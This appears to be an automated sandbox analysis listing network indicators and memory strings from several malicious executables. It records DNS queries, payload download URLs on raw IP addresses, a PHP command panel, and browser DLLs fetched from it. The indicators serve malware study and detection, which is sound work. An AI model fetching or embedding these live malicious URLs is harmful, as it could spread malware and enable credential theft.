GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control@5 equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: red.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: frogmen-smell.sbs
Source: global traffic DNS traffic detected: DNS query: freewaylumma.online
Source: global traffic DNS traffic detected: DNS query: cl.oud-cdn.de
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: founpiuer.store
Source: global traffic DNS traffic detected: DNS query: navygenerayk.store
Source: global traffic DNS traffic detected: DNS query: scriptyprefej.store
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: marshal-zhukov.com
Source: unknown DoH DNS queries detected: name: assets.msn.com
Source: unknown DoH DNS queries detected: name: ntp.msn.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: 4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exey
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exem
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeX
Source: 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/ov
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 4136f86ac7.exe, 00000025.00000002.3261455776.00000000012FA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeI
Source: skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeN
Source: 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeO
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exep
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/#
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/2c2e-da81-46d0-b6b6-535557bcc5faXX
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllwd
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll=dL
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllad
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2412929391.00000000010F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/;
Source: file.exe, 00000000.00000002.2412929391.0000000001108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/=z
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/H
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%WpO
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-t/
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/9
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/o
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/z
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1t#
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpO
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpYt;
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpa
Source: file.exe, 00000000.00000002.2408418198.00000000004F7000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpiW
Source: file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpit
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: 4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ctionSettingsamLMEM8
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/en-US
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/icies
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/m
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/q
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/t
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.2065
Source: file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206I5i
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.00000000014E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206i
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ViewSizePreferences.SourceAumid1J
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?V
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpes0
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu4
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ons
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ows
Source: skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/file1.exe?8w
Source: skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/file1.exeJ
Source: skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/k4pDgO.ps1
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000019.00000002.2919340127.0000000007074000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi/
Source: file1.exe, 00000018.00000003.2786414749.0000000001324000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797964606.0000000001323000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2853040687.000000000133D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2818361545.0000000001323000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2813789486.0000000001324000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2784537176.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445071785.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file1.exe, 00000018.00000003.2784683552.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2904903520.00000000056FE000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3074470382.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2182267963.000000000115F000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2757140206.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756813608.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878671874.0000000005639000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2880010131.0000000005636000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039312521.0000000005C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000019.00000002.2894050768.0000000004571000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
